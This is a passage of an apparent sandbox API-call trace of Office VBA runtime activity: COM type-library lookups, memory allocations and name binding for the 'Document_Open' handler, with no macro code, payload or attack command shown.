ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.304] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.304] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xe1, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.304] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.304] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xe2, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.304] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.304] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xe3, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.304] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.304] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xe4, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.304] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.304] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xe5, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.304] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.304] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xe6, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.304] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.304] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xe7, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.304] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.304] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xe8, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.304] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.304] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xe9, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.304] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.304] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xea, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.304] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.304] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xeb, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.304] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.304] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xec, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.304] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.304] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xed, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.304] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.305] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xee, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.305] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.305] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xef, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.305] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.305] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xf0, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.305] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.305] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xf1, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.305] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.305] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xf2, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.305] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.305] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xf3, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.305] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.305] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xf4, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.305] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.305] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xf5, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.305] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.305] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xf6, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.305] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.305] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xf7, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.305] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.305] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xf8, ppFuncDesc=0x33e4fb6a78, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6a78, pDummy=0x6) returned 0x0 [0060.305] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.305] IUnknown:QueryInterface (in: This=0x1d39d552a68, riid=0x7ffce0bca878*(Data1=0x20412, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33e4fb6a98 | out: ppvObject=0x33e4fb6a98*=0x1d39d552a68) returned 0x0 [0060.305] ITypeInfo2:GetCustData (in: This=0x1d39d552a68, GUID=0x7ffce0bd5de0*(Data1=0xba65d790, Data2=0x9301, Data3=0x11cf, Data4=([0]=0x8d, [1]=0x22, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x37, [6]=0x53, [7]=0x84)), pVarVal=0x33e4fb6aa8 | out: pVarVal=0x33e4fb6aa8*(varType=0x0, wReserved1=0x0, wReserved2=0x1b9, wReserved3=0x0, varVal1=0x0, varVal2=0x800000000)) returned 0x0 [0060.305] IUnknown:Release (This=0x1d39d552a68) returned 0x2 [0060.305] ITypeInfo:RemoteGetDocumentation (in: This=0x1d39d552a68, memid=-1, refPtrFlags=0xe4fb6aa0, pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0 | out: pBstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0) returned 0x0 [0060.306] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Document", cchWideChar=9, lpMultiByteStr=0x33e4fb69b0, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Document", lpUsedDefaultChar=0x0) returned 9 [0060.306] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Document") returned 0x50d36a [0060.306] IUnknown:QueryInterface (in: This=0x1d39d552bc8, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb6a50 | out: ppvObject=0x33e4fb6a50*=0x0) returned 0x80004002 [0060.306] ITypeInfo:RemoteGetTypeAttr (in: This=0x1d39d552bc8, ppTypeAttr=0x33e4fb6a78, pDummy=0x33e4fb6a50 | out: ppTypeAttr=0x33e4fb6a78, pDummy=0x33e4fb6a50*=0x0) returned 0x0 [0060.306] ITypeInfo:LocalReleaseTypeAttr (This=0x1d39d552bc8) returned 0x0 [0060.306] IUnknown:Release (This=0x1d39d552b18) returned 0x1 [0060.306] IUnknown:Release (This=0x1d39d552bc8) returned 0x5 [0060.306] IUnknown:Release (This=0x1d39d552a68) returned 0x1 [0060.306] IUnknown:AddRef (This=0x1d39d552bc8) returned 0x6 [0060.306] IUnknown:Release (This=0x1d39d552bc8) returned 0x5 [0060.307] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x60) returned 0x1d39d847f10 [0060.307] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0xb8) returned 0x1d39da83580 [0060.307] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x3d0) returned 0x1d39d97e9c0 [0060.307] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x20) returned 0x1d38f2b1000 [0060.307] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x10) returned 0x1d39dbb3350 [0060.307] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x80) returned 0x1d39d826890 [0060.307] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x0) returned 0x1d39d4a96a0 [0060.307] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x0) returned 0x1d39d4a9670 [0060.307] IUnknown:AddRef (This=0x1d3980663b0) returned 0x5 [0060.307] IUnknown:QueryInterface (in: This=0x1d3980663b0, riid=0x7ffce0bcb198*(Data1=0xcacc1e84, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb6b50 | out: ppvObject=0x33e4fb6b50*=0x0) returned 0x80004002 [0060.307] ITypeLib:GetTypeComp (in: This=0x1d3980663b0, ppTComp=0x33e4fb6b48 | out: ppTComp=0x33e4fb6b48*=0x1d3980663c0) returned 0x0 [0060.307] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x38) returned 0x1d39d4a0670 [0060.307] IUnknown:AddRef (This=0x1d3980663c0) returned 0x7 [0060.307] IUnknown:Release (This=0x1d3980663c0) returned 0x6 [0060.307] IUnknown:Release (This=0x1d3980663b0) returned 0x5 [0060.307] IUnknown:AddRef (This=0x1d3985c4c00) returned 0xe [0060.307] IUnknown:QueryInterface (in: This=0x1d3985c4c00, riid=0x7ffce0bcb198*(Data1=0xcacc1e84, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb6b50 | out: ppvObject=0x33e4fb6b50*=0x0) returned 0x80004002 [0060.307] ITypeLib:GetTypeComp (in: This=0x1d3985c4c00, ppTComp=0x33e4fb6b48 | out: ppTComp=0x33e4fb6b48*=0x1d3985c4c10) returned 0x0 [0060.307] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x38) returned 0x1d39d4a0230 [0060.307] IUnknown:AddRef (This=0x1d3985c4c10) returned 0x10 [0060.307] IUnknown:Release (This=0x1d3985c4c10) returned 0xf [0060.307] IUnknown:Release (This=0x1d3985c4c00) returned 0xe [0060.307] IUnknown:AddRef (This=0x1d3980655f0) returned 0x7 [0060.307] IUnknown:QueryInterface (in: This=0x1d3980655f0, riid=0x7ffce0bcb198*(Data1=0xcacc1e84, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb6b50 | out: ppvObject=0x33e4fb6b50*=0x0) returned 0x80004002 [0060.307] ITypeLib:GetTypeComp (in: This=0x1d3980655f0, ppTComp=0x33e4fb6b48 | out: ppTComp=0x33e4fb6b48*=0x1d398065600) returned 0x0 [0060.307] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x38) returned 0x1d39d4a0bf0 [0060.307] IUnknown:AddRef (This=0x1d398065600) returned 0x9 [0060.308] IUnknown:Release (This=0x1d398065600) returned 0x8 [0060.308] IUnknown:Release (This=0x1d3980655f0) returned 0x7 [0060.308] wcscpy_s (in: _Destination=0x1d398218cd8, _SizeInWords=0xa, _Source="*\\CNormal" | out: _Destination="*\\CNormal") returned 0x0 [0060.308] wcsncpy_s (in: _Destination=0x33e4fb6730, _SizeInWords=0x108, _Source="*\\CNormal", _MaxCount=0x106 | out: _Destination="*\\CNormal") returned 0x0 [0060.308] CharLowerBuffW (in: lpsz="*\\CNormal", cchLength=0x9 | out: lpsz="*\\cnormal") returned 0x9 [0060.308] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cnormal", cchWideChar=10, lpMultiByteStr=0x33e4fb6660, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cnormal", lpUsedDefaultChar=0x0) returned 10 [0060.308] _wcsicmp (_String1="*\\CNormal", _String2="*\\CNormal") returned 0 [0060.309] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x40) returned 0x1d39d7bee20 [0060.309] IUnknown:AddRef (This=0x1d3985c5700) returned 0x4 [0060.309] IUnknown:QueryInterface (in: This=0x1d3985c5700, riid=0x7ffce0bcb198*(Data1=0xcacc1e84, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb6b50 | out: ppvObject=0x33e4fb6b50*=0x0) returned 0x80004002 [0060.309] ITypeLib:GetTypeComp (in: This=0x1d3985c5700, ppTComp=0x33e4fb6b48 | out: ppTComp=0x33e4fb6b48*=0x1d3985c5710) returned 0x0 [0060.309] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x38) returned 0x1d39d4a01b0 [0060.309] IUnknown:AddRef (This=0x1d3985c5710) returned 0x6 [0060.309] IUnknown:Release (This=0x1d3985c5710) returned 0x5 [0060.309] IUnknown:Release (This=0x1d3985c5700) returned 0x4 [0060.310] IUnknown:Release (This=0x1d39d552a68) returned 0x1 [0060.310] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x40) returned 0x1d39d7be290 [0060.310] IMalloc:Realloc (This=0x7ffd098ff3f0, pv=0x1d39d847f10, cb=0x70) returned 0x1d39d999c80 [0060.310] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Document_Open") returned 0x5089c1 [0060.310] strcpy_s (in: _Dst=0x33e4fb6a80, _DstSize=0xe, _Src="Document_Open" | out: _Dst="Document_Open") returned 0x0 [0060.310] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33e4fb6a80, cbMultiByte=14, lpWideCharStr=0x33e4fb68d0, cchWideChar=14 | out: lpWideCharStr="Document_Open") returned 14 [0060.310] IUnknown:AddRef (This=0x1d3980663b0) returned 0x6 [0060.310] ITypeLib:RemoteIsName (in: This=0x1d3980663b0, szNameBuf="Document_Open", lHashVal=0x5089c1, pfName=0x33e4fb69a0, pBstrLibName=0x33e4fb68d0 | out: pfName=0x33e4fb69a0*=0, pBstrLibName=0x33e4fb68d0) returned 0x0 [0060.310] IUnknown:Release (This=0x1d3980663b0) returned 0x5 [0060.310] IUnknown:AddRef (This=0x1d3985c4c00) returned 0xf [0060.310] ITypeLib:RemoteIsName (in: This=0x1d3985c4c00, szNameBuf="Document_Open", lHashVal=0x5089c1, pfName=0x33e4fb69a0, pBstrLibName=0x33e4fb68d0 | out: pfName=0x33e4fb69a0*=0, pBstrLibName=0x33e4fb68d0) returned 0x0 [0060.310] IUnknown:Release (This=0x1d3985c4c00) returned 0xe [0060.310] IUnknown:AddRef (This=0x1d3980655f0) returned 0x8 [0060.310] ITypeLib:RemoteIsName (in: This=0x1d3980655f0, szNameBuf="Document_Open", lHashVal=0x5089c1, pfName=0x33e4fb69a0, pBstrLibName=0x33e4fb68d0 | out: pfName=0x33e4fb69a0*=0, pBstrLibName=0x33e4fb68d0) returned 0x0 [0060.311] IUnknown:Release (This=0x1d3980655f0) returned 0x7 [0060.311] IUnknown:AddRef (This=0x1d3985c5700) returned 0x5 [0060.311] ITypeLib:RemoteIsName (in: This=0x1d3985c5700, szNameBuf="Document_Open", lHashVal=0x5089c1, pfName=0x33e4fb69a0, pBstrLibName=0x33e4fb68d0 | out: pfName=0x33e4fb69a0*=0, pBstrLibName=0x33e4fb68d0) returned 0x0 [0060.311] IUnknown:Release (This=0x1d3985c5700) returned 0x4 [0060.311] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x50) returned 0x1d39dbe9b50 [0060.311] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0xb8) returned 0x1d39da82080 [0060.311] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x3d0) returned 0x1d39d980100 [0060.311] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x20) returned 0x1d38f2a5e40 [0060.311] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x10) returned 0x1d39dbb33f0 [0060.311] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x80) returned 0x1d39d827730 [0060.311] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x0) returned 0x1d39d4a9730 [0060.311] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x0) returned 0x1d39d4a9620 [0060.311] IUnknown:AddRef (This=0x1d3980663b0) returned 0x6 [0060.311] IUnknown:QueryInterface (in: This=0x1d3980663b0, riid=0x7ffce0bcb198*(Data1=0xcacc1e84, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb68c0 | out: ppvObject=0x33e4fb68c0*=0x0) returned 0x80004002 [0060.311] ITypeLib:GetTypeComp (in: This=0x1d3980663b0, ppTComp=0x33e4fb68b8 | out: ppTComp=0x33e4fb68b8*=0x1d3980663c0) returned 0x0 [0060.311] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x38) returned 0x1d39d4a02b0 [0060.311] IUnknown:AddRef (This=0x1d3980663c0) returned 0x8 [0060.312] IUnknown:Release (This=0x1d3980663c0) returned 0x7 [0060.312] IUnknown:Release (This=0x1d3980663b0) returned 0x6 [0060.312] IUnknown:AddRef (This=0x1d3985c4c00) returned 0x10 [0060.312] IUnknown:QueryInterface (in: This=0x1d3985c4c00, riid=0x7ffce0bcb198*(Data1=0xcacc1e84, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb68c0 | out: ppvObject=0x33e4fb68c0*=0x0) returned 0x80004002 [0060.312] ITypeLib:GetTypeComp (in: This=0x1d3985c4c00, ppTComp=0x33e4fb68b8 | out: ppTComp=0x33e4fb68b8*=0x1d3985c4c10) returned 0x0 [0060.312] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x38) returned 0x1d39d4a03f0 [0060.312] IUnknown:AddRef (This=0x1d3985c4c10) returned 0x12 [0060.312] IUnknown:Release (This=0x1d3985c4c10) returned 0x11 [0060.312] IUnknown:Release (This=0x1d3985c4c00) returned 0x10 [0060.312] IUnknown:AddRef (This=0x1d3980655f0) returned 0x8 [0060.312] IUnknown:QueryInterface (in: This=0x1d3980655f0, riid=0x7ffce0bcb198*(Data1=0xcacc1e84, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb68c0 | out: ppvObject=0x33e4fb68c0*=0x0) returned 0x80004002 [0060.312] ITypeLib:GetTypeComp (in: This=0x1d3980655f0, ppTComp=0x33e4fb68b8 | out: ppTComp=0x33e4fb68b8*=0x1d398065600) returned 0x0 [0060.312] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x38) returned 0x1d39d4a04f0 [0060.312] IUnknown:AddRef (This=0x1d398065600) returned 0xa [0060.312] IUnknown:Release (This=0x1d398065600) returned 0x9 [0060.312] IUnknown:Release (This=0x1d3980655f0) returned 0x8 [0060.312] IUnknown:AddRef (This=0x1d3985c5700) returned 0x5 [0060.312] IUnknown:QueryInterface (in: This=0x1d3985c5700, riid=0x7ffce0bcb198*(Data1=0xcacc1e84, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb68c0 | out: ppvObject=0x33e4fb68c0*=0x0) returned 0x80004002 [0060.312] ITypeLib:GetTypeComp (in: This=0x1d3985c5700, ppTComp=0x33e4fb68b8 | out: ppTComp=0x33e4fb68b8*=0x1d3985c5710) returned 0x0 [0060.312] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x38) returned 0x1d39d4a0fb0 [0060.312] IUnknown:AddRef (This=0x1d3985c5710) returned 0x7 [0060.312] IUnknown:Release (This=0x1d3985c5710) returned 0x6 [0060.312] IUnknown:Release (This=0x1d3985c5700) returned 0x5 [0060.312] IUnknown:QueryInterface (in: This=0x1d39d552b18, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb6958 | out: ppvObject=0x33e4fb6958*=0x0) returned 0x80004002 [0060.312] IUnknown:QueryInterface (in: This=0x1d39d552b18, riid=0x7ffce0bcf4c0*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb6960 | out: ppvObject=0x33e4fb6960*=0x0) returned 0x80004002 [0060.312] ITypeInfo:GetTypeComp (in: This=0x1d39d552b18, ppTComp=0x33e4fb6968 | out: ppTComp=0x33e4fb6968*=0x1d39d552b20) returned 0x0 [0060.312] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x38) returned 0x1d39d4a1130 [0060.312] IUnknown:AddRef (This=0x1d39d552b20) returned 0x5 [0060.312] IUnknown:Release (This=0x1d39d552b20) returned 0x4 [0060.312] IMalloc:Realloc (This=0x7ffd098ff3f0, pv=0x1d39dbe9b50, cb=0x60) returned 0x1d39d847f10 [0060.312] IUnknown:Release (This=0x1d39d552b18) returned 0x3 [0060.313] IUnknown:Release (This=0x1d39d552b18) returned 0x2 [0060.313] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1d3a32b2b66, cbMultiByte=14, lpWideCharStr=0x33e4fb68d0, cchWideChar=15 | out: lpWideCharStr="Document_Open") returned 14 [0060.313] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x640) returned 0x1d39d7de8e0 [0060.313] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x20) returned 0x1d38f2a69b0 [0060.313] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x0) returned 0x1d39d4a9740 [0060.313] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x0) returned 0x1d39d4a98c0 [0060.313] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x20) returned 0x1d38f2a8510 [0060.313] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x80) returned 0x1d39d825e70 [0060.313] ITypeComp:RemoteBind (in: This=0x1d39d552b20, szName="Document_Open", lHashVal=0x5089c1, wFlags=0x0, ppTInfo=0x33e4fb6888, pDescKind=0x33e4fb689c, ppFuncDesc=0x33e4fb68a0, ppVarDesc=0x7ffd0971a5d3, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x33e4fb6888*=0x0, pDescKind=0x33e4fb689c*=0, ppFuncDesc=0x33e4fb68a0, ppVarDesc=0x7ffd0971a5d3, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0060.314] _mbscpy_s (in: _Dst=0x33e4fb6d70, _DstSizeInBytes=0xe, _Src=0x1d3a3172b3a | out: _Dst=0x33e4fb6d70) returned 0x0 [0060.314] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Document") returned 0x50d36a [0060.314] _mbscpy_s (in: _Dst=0x33e4fb6d70, _DstSizeInBytes=0xe, _Src=0x33e4fb6d79 | out: _Dst=0x33e4fb6d70) returned 0x0 [0060.314] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Open") returned 0x500767 [0060.314] IUnknown:QueryInterface (in: This=0x1d39d552bc8, riid=0x7ffce0bcc368*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb6c88 | out: ppvObject=0x33e4fb6c88*=0x0) returned 0x80004002 [0060.314] IUnknown:QueryInterface (in: This=0x1d39d552bc8, riid=0x7ffce0bcf4c0*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x33e4fb6c90 | out: ppvObject=0x33e4fb6c90*=0x0) returned 0x80004002 [0060.314] ITypeInfo:GetTypeComp (in: This=0x1d39d552bc8, ppTComp=0x33e4fb6c98 | out: ppTComp=0x33e4fb6c98*=0x1d39d552bd0) returned 0x0 [0060.314] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x38) returned 0x1d39d4a1e70 [0060.314] IUnknown:AddRef (This=0x1d39d552bd0) returned 0x8 [0060.314] IUnknown:Release (This=0x1d39d552bd0) returned 0x7 [0060.314] IMalloc:Realloc (This=0x7ffd098ff3f0, pv=0x1d39d999c80, cb=0x80) returned 0x1d39d826650 [0060.314] IUnknown:Release (This=0x1d39d552bc8) returned 0x6 [0060.314] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1d3a3171556, cbMultiByte=5, lpWideCharStr=0x33e4fb6a80, cchWideChar=6 | out: lpWideCharStr="Open") returned 5 [0060.314] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x640) returned 0x1d39db065c0 [0060.314] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x20) returned 0x1d38f2aa670 [0060.314] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x0) returned 0x1d39d4a9630 [0060.315] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x0) returned 0x1d39d4a97b0 [0060.315] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x20) returned 0x1d38f2ab0f0 [0060.315] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x80) returned 0x1d39d825c30 [0060.315] ITypeComp:RemoteBind (in: This=0x1d39d552bd0, szName="Open", lHashVal=0x500767, wFlags=0x1, ppTInfo=0x33e4fb6a38, pDescKind=0x33e4fb6a4c, ppFuncDesc=0x33e4fb6a50, ppVarDesc=0x1d38cdd0cc0, 